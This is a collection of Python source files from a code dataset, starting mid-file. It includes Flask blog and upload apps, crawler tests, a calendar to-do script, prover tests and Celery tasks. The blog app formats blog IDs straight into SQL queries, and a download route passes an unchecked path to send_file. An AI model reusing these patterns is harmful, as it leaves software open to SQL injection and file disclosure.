0:\n results = cur.fetchall()\n items = ItemTable(results)\n return render_template('view-qr.html', Items=results)\n else:\n return render_template('view-qr.html', Items=None)\n\n@app.route('/db')\ndef qr_database():\n return render_template('qr-database.html')\n\n@app.route('/blogs//')\ndef blogs(id):\n cur = mysql.connection.cursor()\n resultValue = cur.execute(\"SELECT * FROM blog WHERE blog_id={}\".format(id))\n if resultValue > 0:\n blog = cur.fetchone()\n return render_template('blogs.html', blog=blog)\n return 'Blog not found'\n\n@app.route('/register', methods=['GET','POST'])\ndef register():\n if request.method == 'POST':\n userDetails = request.form\n if(userDetails['password']) != 
userDetails['confirm_password']:\n            flash(\"Passwords do not match! Try again.\", 'danger')\n            return render_template('register.html')\n        cur = mysql.connection.cursor()\n        cur.execute(\"INSERT INTO user(first_name, last_name, username, email, password)\"\n                    \"VALUES(%s,%s,%s,%s,%s)\", (userDetails['first_name'], userDetails['last_name'],\n                    userDetails['username'], userDetails['email'], generate_password_hash(userDetails['password'])))\n        mysql.connection.commit()\n        cur.close()\n        flash('Registration successful! Please login.', 'success')\n        return redirect('/login')\n    return render_template('register.html')\n\n@app.route('/login', methods=['GET','POST'])\ndef login():\n    if request.method == 'POST':\n        userDetails = request.form\n        username = userDetails['username']\n        cur = mysql.connection.cursor()\n        resultValue = cur.execute(\"SELECT * FROM user WHERE username = %s\", ([username]))\n        if resultValue > 0:\n            user = cur.fetchone()\n            if check_password_hash(user['password'], userDetails['password']):\n                session['login'] = True\n                session['firstName'] = user['first_name']\n                session['lastName'] = user['last_name']\n                flash(\"Welcome \" + session['firstName'] + '! You have successfully logged in.', 'success')\n            else:\n                cur.close()\n                flash(\"Password does not match.\", 'danger')\n                return render_template('login.html')\n        else:\n            cur.close()\n            flash('User not found', 'danger')\n            return render_template('login.html')\n        cur.close()\n        return redirect('/')\n    return render_template('login.html')\n\n@app.route('/logout')\ndef logout():\n    session.clear()\n    flash(\"You have been logged out.\", 'info')\n    return redirect('/')\n\n@app.route('/my-blogs')\ndef my_blogs():\n    if session.get('firstName'):\n        author = session['firstName'] + ' ' + session['lastName']\n        cur = mysql.connection.cursor()\n        resultValue = cur.execute(\"SELECT * FROM blog WHERE author = %s\", [author])\n        if resultValue > 0:\n            blogs = cur.fetchall()\n            cur.close()\n            return render_template('my-blogs.html', blogs=blogs)\n    else:\n        cur = mysql.connection.cursor()\n        resultValue = cur.execute(\"SELECT * from blog\")\n        if resultValue > 0:\n            blogs = cur.fetchall()\n            cur.close()\n            return render_template('my-blogs.html', blogs=blogs)\n    cur.close()\n    return render_template('my-blogs.html', blogs=None)\n\n\n@app.route('/write-blog/', methods=['GET','POST'])\ndef write_blog():\n    if request.method == 'POST':\n        blogpost = request.form\n        title = blogpost['title']\n        body = blogpost['body']\n        author = session['firstName'] + ' ' + session['lastName']\n        cur = mysql.connection.cursor()\n        cur.execute(\"INSERT INTO blog(title, body, author) VALUES(%s, %s, %s)\", (title, body, author))\n        mysql.connection.commit()\n        cur.close()\n        flash(\"Successfully posted new blog\", 'success')\n        return redirect('/')\n    return render_template('write-blog.html')\n\n@app.route('/edit-blog/<int:id>/', methods=['GET', 'POST'])\ndef edit_blog(id):\n    if request.method == 'POST':\n        cur = mysql.connection.cursor()\n        title = request.form['title']\n        body = request.form['body']\n        cur.execute(\"UPDATE blog SET title = %s, body = %s WHERE blog_id = %s\", (title, body, id))\n        mysql.connection.commit()\n        cur.close()\n        flash('Blog updated successfully.', 'success')\n        return redirect('/blogs/{}'.format(id))\n    cur = mysql.connection.cursor()\n    resultValue = cur.execute(\"SELECT * FROM blog WHERE blog_id = {}\".format(id))\n    if resultValue > 0:\n        blog = cur.fetchone()\n        blog_form = {}\n        blog_form['title'] = blog['title']\n        blog_form['body'] = blog['body']\n        return render_template('edit-blog.html', 
blog_form=blog_form)\n\n@app.route('/delete-blog/<int:id>/')\ndef delete_blog(id):\n    cur = mysql.connection.cursor()\n    cur.execute(\"DELETE FROM blog WHERE blog_id = {}\".format(id))\n    mysql.connection.commit()\n    flash(\"Your blog has been deleted\", 'success')\n    return redirect('/')\n\nif __name__ == '__main__':\n    app.run()\n\n","sub_path":"myapp.py","file_name":"myapp.py","file_ext":"py","file_size_in_byte":8035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"368059224","text":"# -*- coding: utf-8 -*-\n#author:Haochun Wang\nimport xlrd, xlwt, os, time\nclass Tablemaker:\n    def __init__(self):\n        self.font0 = xlwt.Font()\n        self.font0.colour_index = 2 # red\n        self.font1 = xlwt.Font()\n        self.font1.colour_index = 3 # green\n        self.style0 = xlwt.XFStyle()\n        self.style1 = xlwt.XFStyle()\n        self.style0.font = self.font0\n        self.style1.font = self.font1\n        self.write_table()\n\n    def write_table(self):\n        with open('res_tmp.txt') as d: # open the temporary text file\n            p = d.readlines()\n        products = sorted(p) # sort the lines by the alphabet order of product names\n        timestamp = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime(time.time()))\n        path_exist = 'price_folder/price.xls'\n        save_path = 'price_folder/price' + timestamp + '.xls'\n        path_folder = '/Users/hcwang/Desktop/spider-py/aus_spider/price_folder/'\n\n        try:\n            lists = os.listdir(path_folder) # list every file and folder under the directory into lists\n            lists.sort(key=lambda fn: os.path.getmtime(path_folder + \"/\" + fn)) # sort by modification time\n            path_exist = os.path.join(path_folder, lists[-1]) # take the most recent file as the previous price table\n\n            oldsheet = xlrd.open_workbook(path_exist).sheet_by_index(0)\n            numrow = oldsheet.nrows\n            olddic = {}\n            for i in range(1, numrow):\n                olddic[oldsheet.row_values(i)[0].replace(' ', '-').replace('\\'', '39')] = oldsheet.row_values(i)[1]\n\n            newbook = xlwt.Workbook(encoding='utf-8', style_compression=0)\n            newsheet = newbook.add_sheet('sheet1', cell_overwrite_ok=True)\n            new_sheet_sorted = newbook.add_sheet('sheet2', cell_overwrite_ok=True)\n\n            currentrow = 1\n            newsheet.write(0, 0, 'product_name_en')\n            newsheet.write(0, 1, 'price_aud')\n            newsheet.write(0, 2, 'price_yuan')\n            newsheet.write(0, 3, 'discount') \n\n            for i in xrange(len(products) - 1):\n                rowsplits = products[i].split(', ')\n                #print rowsplits[1][1:]\n                #print type(rowsplits[1][1:])\n                #print len(rowsplits[1][1:])\n                newsheet.write(currentrow, 0, rowsplits[0].replace('-', ' ').replace('39', '\\''))\n                if olddic.has_key(rowsplits[0]) and float(olddic[rowsplits[0]]) > float(rowsplits[1][1:]):\n                    newsheet.write(currentrow, 1, float(rowsplits[1][1:]), self.style0)\n                    newsheet.write(currentrow, 2, float(rowsplits[2]), self.style0)\n                    newsheet.write(currentrow, 3, float(rowsplits[3]), self.style0)\n                elif olddic.has_key(rowsplits[0]) and float(olddic[rowsplits[0]]) < float(rowsplits[1][1:]):\n                    newsheet.write(currentrow, 1, float(rowsplits[1][1:]), self.style1)\n                    newsheet.write(currentrow, 2, float(rowsplits[2]), self.style1)\n                    newsheet.write(currentrow, 3, float(rowsplits[3]), self.style1)\n                else:\n                    newsheet.write(currentrow, 1, float(rowsplits[1][1:]))\n                    newsheet.write(currentrow, 2, float(rowsplits[2]))\n                    newsheet.write(currentrow, 3, float(rowsplits[3]))\n                currentrow += 1\n            newbook.save(save_path)\n        except:\n            newbook = xlwt.Workbook(encoding='utf-8',style_compression=0)\n            newsheet = newbook.add_sheet('sheet1', cell_overwrite_ok=True)\n\n            currentrow = 1\n            newsheet.write(0, 0, 'product_name_en')\n            newsheet.write(0, 1, 'price_aud')\n            newsheet.write(0, 2, 'price_yuan')\n            newsheet.write(0, 3, 
'discount')\n            for i in xrange(len(products)-1):\n                rowsplits = products[i].split(', ')\n                newsheet.write(currentrow, 0, rowsplits[0].replace('-', ' ').replace('39', '\\''))\n                newsheet.write(currentrow, 1, float(rowsplits[1][1:]))\n                newsheet.write(currentrow, 2, float(rowsplits[2]))\n                newsheet.write(currentrow, 3, float(rowsplits[3]))\n                currentrow += 1\n            newbook.save(save_path)\n\n\n        return\nTablemaker()","sub_path":"rate.py","file_name":"rate.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"581239937","text":"import os\n\nfrom flask import Flask, request, send_file\n\nfrom . import utils\n\n\ndef create_app(test_config=None):\n    # create and configure the app\n    app = Flask(__name__, instance_relative_config=True)\n    app.config.from_mapping(\n        SECRET_KEY='dev',\n        DATABASE=os.path.join(app.instance_path, 'flaskr.sqlite'),\n        CACHE=os.path.join(os.getcwd(), 'cache')\n    )\n\n    if test_config is None:\n        # load the instance config, if it exists, when not testing\n        app.config.from_pyfile('config.py', silent=True)\n    else:\n        # load the test config if passed in\n        app.config.from_mapping(test_config)\n\n    # ensure the instance folder exists\n    try:\n        os.makedirs(app.instance_path)\n    except OSError:\n        pass\n\n    try:\n        os.makedirs(app.config['CACHE'])\n    except OSError:\n        pass\n\n    # a simple page that says hello\n    @app.route('/hello')\n    def hello():\n        return 'Hello, World!'\n\n\n    @app.route('/upload', methods=['POST'])\n    def upload_file():\n        if request.method == 'POST':\n            # check if the post request has the file part\n            print(request.files)\n            if 'file' not in request.files:\n                return 'No file part'\n\n            file = request.files['file']\n            # if the user does not select a file, the browser also\n            # submits an empty part without a filename\n            if file.filename == '':\n                return 'No selected file'\n            if file and utils.allowed_file(file.filename):\n                # sanitize the client-supplied name before saving\n                filename = utils.secure_filename(file.filename)\n                file.save(os.path.join(app.config['CACHE'], filename))\n                return filename + ' is uploaded'\n\n\n    @app.route('/heatmap/<pid>')\n    def get_image(pid):\n        #For windows you need to use drive name [ex: F:/Example.pdf]\n        path = os.path.join(os.getcwd(),'cache/{}'.format(pid))\n        return send_file(path, as_attachment=True)\n\n\n\n    return app\n\n","sub_path":"flaskr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"607650456","text":"import unittest\nimport asyncio\nfrom crawler import pools\nfrom crawler.by_async import fetcher,parser,saver\nclass Test(unittest.TestCase):\n    def setUp(self):\n        '''runs before each test'''\n        print('setUp')\n    def tearDown(self):\n        '''runs after each test'''\n        print('tearDown')\n    def test_urlpool(self):\n        url = pools.UrlPool()\n        urlset=set()\n        for i in range(1000):\n            x=hash(\"asxvzpcmzurl\")\n            url.put(x)\n            urlset.add(x)\n        self.assertEqual(len(urlset),url.qsize(),msg=\\\n            \"UrlPool or BloomFilter has error\") \n    def test_AsyncFetcher(self):\n        try:\n            url=\"http://www.baidu.com\"\n            test_fetcher = fetcher.Fetcher()\n            tasks = [\n                asyncio.ensure_future(test_fetcher.fetch(url)),\n            ]\n            loop = asyncio.get_event_loop()\n            html = loop.run_until_complete(asyncio.wait(tasks))\n            test_fetcher.close_session()\n            try:\n                loop.run_until_complete(asyncio.wait(tasks))\n            except KeyboardInterrupt as e:\n                for task in asyncio.Task.all_tasks():\n                    task.cancel()\n                loop.run_forever() # restart loop\n            finally:\n                
loop.close()\n        except Exception as e:\n            self.assertFalse(expr=e)\n    def test_AsyncParser(self):\n        \"\"\"\n        there are 8 urls in the html\n        \"\"\"\n        html = '''登录
糯米新闻hao\\\n 123地图视频贴吧`.\n\n If you configure a login url with a query parameter, Tornado will\n assume you know what you're doing and use it as-is. If not, it\n will add a `next` parameter so the login page knows where to send\n you once you're logged in.\n \"\"\"\n @functools.wraps(method)\n @coroutine\n def wrapper(self, *args, **kwargs):\n input_token = self.get_argument('access_token', None)\n try:\n assert input_token\n token = yield AccessTokenRepository.read_one(access_token=input_token)\n if token.is_expired:\n raise InvalidArguments\n except NoResultFound:\n self.set_status(httplib.UNAUTHORIZED)\n self.write({\n 'error': 'Invalid Access Token',\n 'payload': {\n 'access_token': input_token\n }\n })\n raise Return()\n except InvalidArguments:\n self.set_status(httplib.BAD_REQUEST)\n self.write({\n 'error': 'Access Token Expired',\n 'payload': {\n 'access_token': input_token,\n }\n })\n except AssertionError:\n self.set_status(httplib.BAD_REQUEST)\n self.write({\n 'error': 'Missing Access Token',\n })\n raise Return()\n raise Return(method(self, *args, **kwargs))\n return wrapper\n","sub_path":"ParkingFinder/handlers/base/validate_token.py","file_name":"validate_token.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"570197580","text":"import queue\n\n\nclass topological():\n def __init__(self):\n self.__read_data()\n self.status = [-1 for _ in range(self.V)]\n self.indeg = [0 for _ in range(self.V)]\n self.__assign_indeg()\n self.__assign_adj_list()\n self.out = []\n\n def __read_data(self):\n self.V, self.E = list(map(int, input().split()))\n self.Nodes = [list(map(int, input().split())) for _ in range(self.E)]\n\n def __assign_indeg(self):\n for node in self.Nodes:\n self.indeg[node[1]] += 1\n\n def __assign_adj_list(self):\n self.adj_list = [[] for _ in range(self.V)]\n for node in self.Nodes:\n self.adj_list[node[0]].append(node[1])\n\n def __bfs(self, s):\n q = queue.Queue()\n q.put(s)\n self.status[s] = 1\n while not q.empty():\n u = q.get()\n self.out.append(u)\n for v in self.adj_list[u]:\n self.indeg[v] -= 1\n if self.indeg[v] == 0 and self.status[v] != 1:\n self.status[v] = 1\n q.put(v)\n\n def __sort(self):\n for i in range(self.V):\n if self.indeg[i] == 0 and self.status[i] != 1:\n self.__bfs(i)\n\n def exec(self):\n self.__sort()\n\n def show(self):\n for i in self.out:\n print(i)\n\n\ndef main():\n obj = topological()\n obj.exec()\n obj.show()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"kyopro/aizu/GRL/GRL_4_B_TopologicalSort_bfs.py","file_name":"GRL_4_B_TopologicalSort_bfs.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"32836524","text":"from __future__ import print_function\r\nimport httplib2\r\nimport os\r\n\r\nfrom apiclient import discovery\r\nfrom oauth2client import client\r\nfrom oauth2client import tools\r\nfrom oauth2client.file import Storage\r\n\r\nimport datetime\r\n\r\nfrom bs4 import BeautifulSoup, SoupStrainer\r\nimport urllib2\r\nimport re\r\nimport random\r\n\r\ntry:\r\n import argparse\r\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\r\nexcept ImportError:\r\n flags = None\r\n\r\nSCOPES = 'https://www.googleapis.com/auth/calendar.readonly'\r\nCLIENT_SECRET_FILE = 'client_secret.json'\r\nAPPLICATION_NAME = 'Google Calendar API Python Quickstart'\r\n\r\n\r\n#Google Calendar Python API\r\ndef get_credentials():\r\n 
\"\"\"Gets valid user credentials from storage.\r\n\r\n If nothing has been stored, or if the stored credentials are invalid,\r\n the OAuth2 flow is completed to obtain the new credentials.\r\n\r\n Returns:\r\n Credentials, the obtained credential.\r\n \"\"\"\r\n home_dir = os.path.expanduser('~')\r\n credential_dir = os.path.join(home_dir, '.credentials')\r\n if not os.path.exists(credential_dir):\r\n os.makedirs(credential_dir)\r\n credential_path = os.path.join(credential_dir,\r\n 'calendar-python-quickstart.json')\r\n\r\n store = Storage(credential_path)\r\n credentials = store.get()\r\n if not credentials or credentials.invalid:\r\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\r\n flow.user_agent = APPLICATION_NAME\r\n if flags:\r\n credentials = tools.run_flow(flow, store, flags)\r\n else: # Needed only for compatibility with Python 2.6\r\n credentials = tools.run(flow, store)\r\n print('Storing credentials to ' + credential_path)\r\n return credentials\r\n\r\ndef main():\r\n \"\"\"\r\n Creates a Google Calendar API service object and outputs a list of up to ten upcoming events \r\n of the user's calendar; also outputs various other sections defined below as a daily to do list txt file\r\n \"\"\"\r\n credentials = get_credentials()\r\n http = credentials.authorize(httplib2.Http())\r\n service = discovery.build('calendar', 'v3', http=http)\r\n\r\n now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time\r\n eventsResult = service.events().list(\r\n calendarId='primary', timeMin=now, maxResults=10, singleEvents=True,\r\n orderBy='startTime').execute()\r\n events = eventsResult.get('items', [])\r\n\r\n\r\n #build list of calendar events \r\n mainEvent = []\r\n if not events:\r\n mainEvent.append('No upcoming events found.')\r\n for event in events:\r\n start = event['start'].get('dateTime', event['start'].get('date'))\r\n mainEvent.append(start + \" \" + event['summary'])\r\n\r\n\r\n #This parses allrecipes.com for three random recipes per day to list \r\n http = httplib2.Http()\r\n status, response = http.request('http://allrecipes.com/recipes/454/everyday-cooking/more-meal-ideas/15-minute-meals/?internalSource=hub%20nav&referringId=1947&referringContentType=recipe%20hub&linkName=hub%20nav%20daughter&clickId=hub%20nav%202')\r\n\r\n recipeList = []\r\n for link in BeautifulSoup(response, \"html.parser\", parse_only=SoupStrainer('a')):\r\n if link.has_attr('href'):\r\n if '/recipe' in link['href']:\r\n recipeList.append(link['href'])\r\n\r\n todaysRecipes = []\r\n todaysRecipes.append('http://allrecipes.com' + random.choice(recipeList))\r\n todaysRecipes.append('http://allrecipes.com' + random.choice(recipeList))\r\n todaysRecipes.append('http://allrecipes.com' + random.choice(recipeList))\r\n\r\n #determines what day of workout it is based on prior day or resets circuit \r\n #note that this reads from whatever directory you choose to have the output file sent to; so this is my personal directory \r\n todaysWorkout = 'arms'\r\n try:\r\n if 'arms' in open(r\"C:\\Users\\Claire\\Desktop\\pydaily.txt\").read():\r\n todaysWorkout = 'legs'\r\n if 'legs' in open(r\"C:\\Users\\Claire\\Desktop\\pydaily.txt\").read():\r\n todaysWorkout = 'back'\r\n if 'back' in open(r\"C:\\Users\\Claire\\Desktop\\pydaily.txt\").read():\r\n todaysWorkout = 'chest'\r\n if 'chest' in open(r\"C:\\Users\\Claire\\Desktop\\pydaily.txt\").read():\r\n todaysWorkout = 'shoulders'\r\n if 'shoulders' in open(r\"C:\\Users\\Claire\\Desktop\\pydaily.txt\").read():\r\n todaysWorkout = 
'break day'\r\n        if 'break day' in open(r\"C:\\Users\\Claire\\Desktop\\pydaily.txt\").read():\r\n            todaysWorkout = 'arms'\r\n    except:\r\n        print(\"No pre-existing file to read from.\")\r\n\r\n\r\n\r\n    #These are additional things for the list; a greeting, a sample to do list, and an add-on section \r\n    greeting= \"Hello! It's \" + datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\")\r\n    dailyDo = ['thing 1', 'thing 2', 'thing 3', 'thing 4', 'thing 5 ', 'thing 6', 'thing 7 etc etc ']\r\n    adds = \"Additional Notes About Today:\"\r\n\r\n\r\n    #output all daily info to text file, rewrites file each time program is run \r\n    with open(r\"C:\\Users\\Claire\\Desktop\\pydaily.txt\", \"w\") as f:\r\n        f.write(greeting)\r\n        f.write('\\n')\r\n        f.write('\\n')\r\n        f.write(\"Daily To-Do:\")\r\n        f.write('\\n')\r\n        for thing in dailyDo:\r\n            f.write(thing)\r\n            f.write('\\n')\r\n        f.write('\\n')\r\n        f.write(\"Major Upcoming Events\")\r\n        f.write('\\n')\r\n        for thing in mainEvent:\r\n            f.write(thing)\r\n            f.write('\\n')\r\n        f.write('\\n')\r\n        f.write(\"Random Recipe Ideas\")\r\n        f.write('\\n')\r\n        for thing in todaysRecipes:\r\n            f.write(thing)\r\n            f.write('\\n')\r\n        f.write('\\n')\r\n        f.write(\"Today's Workout:\")\r\n        f.write(todaysWorkout)\r\n        f.write('\\n')\r\n        f.write(adds)\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","sub_path":"pydaily.py","file_name":"pydaily.py","file_ext":"py","file_size_in_byte":5845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"61409725","text":"from models.units_model import Units\n\n\ndef show_menu():\n    '''\n    prints program menu\n    '''\n    menu = [\"\\nWhat would you like to do:\\n\",\n            \"(1) List statistics\",\n            \"(2) Display 3 cities with longest names\",\n            \"(3) Display county's name with the largest number of communities\",\n            \"(4) Display locations that belong to more than one category\",\n            \"(5) Advanced search\",\n            \"(0) Exit program\\n\"]\n\n    for line in menu:\n        print(line)\n\n\ndef print_file_not_found():\n    print(\"File 'malopolska.csv' not found\")\n\n\ndef get_choice():\n    return input('Choose option: ')\n\n\ndef print_bad_choice():\n    print('\\nBad choice, try again: \\n')\n\n\ndef display_longest_name_cities(malopolska):\n    '''\n    Args:\n        - malopolska = obj of Units class\n    '''\n    print('\\nCities with a longest name: ')\n    for city in malopolska.get_cities_with_longest_names():\n        print(city)\n\n\ndef display_largest_counties(malopolska):\n    print(\"\\nThe county with the largest number of communes is {}\".format(malopolska.get_county_with_most_communes_num().name))\n\n\ndef display_multicategory_locations(malopolska):\n    '''\n    Displays locations that belongs to more than 1 category\n    '''\n    location_occurency_dict = malopolska.get_locations_dict()\n\n    for key, value in location_occurency_dict.items():\n        if value > 1:\n            print(\"{:25} number of categories: {}\".format(key, value))\n\n\ndef print_table(table, title_list):\n    \"\"\"\n    Prints table with data.\n\n    Args:\n        table: list of lists - table to display\n        title_list: list containing table headers\n\n    Returns:\n        This function doesn't return anything, it only prints to the console.\n    \"\"\"\n    # Build a dictionary with each column's widest record length\n    column_widths = {}\n    total_width = 0\n\n    for i in range(len(title_list)):\n        widths = []\n        widths.append(len(str(title_list[i])))\n        for item in table:\n            widths.append(len(str(item[i])))\n        max_column_width = get_max_number(widths) + 4\n        column_widths[\"column_\" + str(i)] = max_column_width\n        total_width += max_column_width\n    total_width += len(title_list) + 1\n\n    # Printing\n    print(\"/\" + \"-\" * (total_width - 2) + \"\\\\\")\n    print(\"|\", end=\"\")\n    for i in range(len(title_list)):\n        print(\"{:^{}}\".format(title_list[i], column_widths[\"column_\" + str(i)]), \"|\", end=\"\", sep=\"\")\n    print()\n    for i in range(len(table)):\n        print(\"|\", end=\"\")\n        for j in range(len(table[i])):\n            print(\"{:-^{}}\".format(\"\", column_widths[\"column_\" + str(j)]), \"|\", end=\"\", sep=\"\")\n        print()\n        print(\"|\", end=\"\")\n        for j in range(len(table[i])):\n            print(\"{:^{}}\".format(table[i][j], column_widths[\"column_\" + str(j)]), \"|\", end=\"\", sep=\"\")\n        print()\n    print(\"\\\\\" + \"-\" * (total_width - 2) + \"/\")\n    print()\n\n\ndef get_max_number(numbers):\n    '''\n    Takes a list of values and returns the largest one\n\n    Args:\n        -numbers = list of comparable values (here: column widths)\n\n    Returns:\n        - max_number = the largest value in the list\n    '''\n    max_number = numbers[0]\n    for i in range(1, len(numbers)):\n        if numbers[i] > max_number:\n            max_number = numbers[i]\n    return max_number\n\n\ndef get_phrase():\n    return input('Searching for: ')\n\n\ndef print_not_found():\n    print('\\nEntered phrase not found.')\n\n\ndef print_found(score_table):\n    print(\"\\nFound {} location(s):\\n\".format(len(score_table)))\n","sub_path":"views/units_view.py","file_name":"units_view.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"451972283","text":"\"\"\" (c) This file is part of the course\n    Mathematical Logic through Programming\n    by Gonczarowski and Nisan.\n    File name: code/predicates/prover_test.py \"\"\"\n\nfrom predicates.some_proofs import *\n\ndef test_prover_basic(debug=False):\n    proof = syllogism_proof(debug)\n    # Will be tested with the course staff's implementation of is_valid\n    assert proof.is_valid()\n\n    # Partial run - verifies all steps until stopped\n    right_neutral_proof(True, True, True, True, debug)\n\ndef test_add_universal_instantiation(debug=False):\n    proof = syllogism_proof_with_universal_instantiation(debug)\n    # Will be tested with the course staff's implementation of is_valid\n    assert proof.is_valid()\n\n    # With a different variable name\n    prover = Prover({'Ay[(Man(y)->Mortal(y))]', 'Man(aristotle)'},\n                    'Mortal(aristotle)', debug)\n    step1 = prover.add_assumption('Ay[(Man(y)->Mortal(y))]')\n    step2 = prover.add_universal_instantiation(\n        '(Man(aristotle)->Mortal(aristotle))', step1, 'aristotle')\n    step3 = prover.add_assumption('Man(aristotle)')\n    step4 = prover.add_mp('Mortal(aristotle)', step3, step2)\n    # Will be tested with the course staff's implementation of is_valid\n    assert prover.proof.is_valid()\n\n    proof = syllogism_all_all_proof(debug)\n    # Will be tested with the course staff's implementation of is_valid\n    assert proof.is_valid()\n\ndef test_add_tautological_inference(debug=False):\n    proof = syllogism_all_all_proof_with_tautological_inference(debug)\n    # Will be tested with the course staff's implementation of is_valid\n    assert proof.is_valid()\n\n    proof = syllogism_all_exists_proof()\n    # Will be tested with the course staff's implementation of is_valid\n    assert proof.is_valid()\n\ndef test_add_existential_derivation(debug=False):\n    proof = syllogism_all_exists_proof_with_existential_derivation(debug)\n    # Will be tested with the course staff's implementation of is_valid\n    assert proof.is_valid()\n\ndef test_add_flipped_equality(debug=False):\n    # Partial run - verifies all steps until stopped\n    proof = right_neutral_proof(False, True, True, True, debug)\n    # Verify that the critical 
conclusions were indeed derived\n    assert _contains_line_with_formula(proof, 'x=plus(0,x)')\n    assert _contains_line_with_formula(proof, '0=plus(minus(x),x)')\n    assert _contains_line_with_formula(\n        proof, 'plus(x,plus(y,z))=plus(plus(x,y),z)')\n\ndef test_add_free_instantiation(debug=False):\n    # Partial run - verifies all steps until stopped\n    proof = right_neutral_proof(False, False, True, True, debug) \n    # Verify that the critical conclusions were indeed derived\n    assert _contains_line_with_formula(\n        proof, '0=plus(minus(minus(x)),minus(x))')\n    assert _contains_line_with_formula(\n        proof,\n        'plus(plus(minus(minus(x)),minus(x)),x)='\n        'plus(minus(minus(x)),plus(minus(x),x))')\n    assert _contains_line_with_formula(proof, 'plus(0,0)=0')\n    assert _contains_line_with_formula(proof, 'plus(x,0)=plus(0,plus(x,0))')\n    assert _contains_line_with_formula(\n        proof, 'plus(0,plus(x,0))=plus(plus(0,x),0)')\n\ndef test_add_substituted_equality(debug=False):\n    # Partial run - verifies all steps until stopped\n    proof = right_neutral_proof(False, False, False, True, debug)\n    # Verify that the critical conclusions were indeed derived\n    assert _contains_line_with_formula(\n        proof,\n        'plus(plus(0,x),0)=plus(plus(plus(minus(minus(x)),minus(x)),x),0)')\n    assert _contains_line_with_formula(\n        proof,\n        'plus(plus(plus(minus(minus(x)),minus(x)),x),0)='\n        'plus(plus(minus(minus(x)),plus(minus(x),x)),0)')\n    assert _contains_line_with_formula(\n        proof,\n        'plus(plus(minus(minus(x)),plus(minus(x),x)),0)='\n        'plus(plus(minus(minus(x)),0),0)')\n    assert _contains_line_with_formula(\n        proof, 'plus(minus(minus(x)),plus(0,0))=plus(minus(minus(x)),0)')\n    assert _contains_line_with_formula(\n        proof, 'plus(minus(minus(x)),0)=plus(minus(minus(x)),plus(minus(x),x))')\n    assert _contains_line_with_formula(\n        proof, 'plus(plus(minus(minus(x)),minus(x)),x)=plus(0,x)')\n\ndef test_add_chained_equality(debug=False):\n    proof = right_neutral_proof(False, False, False, False, debug)\n    # Will be tested with the course staff's implementation of is_valid\n    assert proof.is_valid()\n\ndef _contains_line_with_formula(proof, formula):\n    for line in proof.lines:\n        if str(line.formula) == formula:\n            return True\n    return False\n\ndef test_ex10(debug=False):\n    test_prover_basic(debug)\n    test_add_universal_instantiation(debug)\n    test_add_tautological_inference(debug)\n    test_add_existential_derivation(debug)\n    test_add_flipped_equality(debug)\n    test_add_free_instantiation(debug)\n    test_add_substituted_equality(debug)\n    test_add_chained_equality(debug)\n\ndef test_all(debug=False):\n    test_ex10(debug)\n","sub_path":"code/predicates/prover_test.py","file_name":"prover_test.py","file_ext":"py","file_size_in_byte":4932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"392214198","text":"from util.responsetype import ResponseType\nfrom linebot.models import (\n    TextSendMessage, ImageSendMessage\n)\n\n\nclass MessageBuilder:\n    def __init__(self):\n        self.msg = []\n\n    def append_text(self, msg):\n        self.msg.append(\n            TextSendMessage(text=msg)\n        )\n        return self\n\n    def append_img(self, original_url, preview_url=None):\n        self.msg.append(\n            ImageSendMessage(original_content_url=original_url, preview_image_url=preview_url if preview_url is not None else original_url)\n        )\n        return self\n","sub_path":"util/messagebuilder.py","file_name":"messagebuilder.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"522439802","text":"import sys\nimport 
re\nimport os\nos.chdir('D:')\nf=open(\"7\",\"r\")\nw=[]\nsubl=[]\nsubd={}\nfr=f.read()\nmatch=re.search('subject:(.+)\\n',fr.lower())\nif match:\n    print ('found',match.group(1))\n    subl=subl+[w for w in re.split('\\W',match.group(1)) if w]\n    print (subl)\n    for element in subl:\n        if element in subd:\n            subd[element]+=1\n        else: subd[element]=1\n    print (subd.items())\nmatch=re.search('filename:.+\\n([.+^\"----\"])',fr.lower())\nif match:\n    print (match.group())\nf.close()\n","sub_path":"rand.py","file_name":"rand.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"401112997","text":"from celery import Celery\nimport time\n\napp = Celery('tasks', broker='redis://localhost:6379')\n\n\n@app.task\ndef add(x, y):\n    n = x + y\n    time.sleep(5)\n    # print(n)\n    return n\n\n@app.task\ndef sub(x, y):\n    n = x - y\n    time.sleep(8)\n    return n\n\n\n@app.task\ndef send_email(to):\n    time.sleep(7)\n    print(to)\n\n\n\nif __name__ == '__main__':\n\n    add.delay(1, 2)\n    sub.delay(3, 2)\n\n    print('Program finished!')\n\n\n\n\n","sub_path":"code/FlaskCelery/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
